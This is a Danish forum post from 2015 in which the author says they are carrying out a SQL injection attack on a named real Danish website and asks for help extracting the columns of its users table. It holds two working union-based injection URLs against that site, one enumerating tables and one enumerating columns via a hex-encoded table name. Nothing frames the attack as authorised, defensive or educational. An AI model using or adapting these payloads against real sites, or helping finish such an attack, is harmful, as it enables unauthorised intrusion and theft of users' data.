20-06-2015, 09:59
Hej.
Jeg har ikke oplevet dette før.
Jeg er i gang med at sql injecte denne side: http://www.dagbladene.dk/
Liste over tables:
Hvis jeg spørger efter db_mod_users vil den ikke.
Det sjove det er jeg godt kan få nogle af de andre til at virke, men ikke denne. Nogle der kan hjælpe?
Jeg har ikke oplevet dette før.
Jeg er i gang med at sql injecte denne side: http://www.dagbladene.dk/
Liste over tables:
Kode:
http://www.dagbladene.dk/index.php?mod=news&area=1&id=282 UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables where table_schema=database()--
Hvis jeg spørger efter db_mod_users vil den ikke.
Kode:
http://www.dagbladene.dk/index.php?mod=news&area=1&id=282 UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_name=0x64625f6d6f645f7573657273--
Det sjove det er jeg godt kan få nogle af de andre til at virke, men ikke denne. Nogle der kan hjælpe?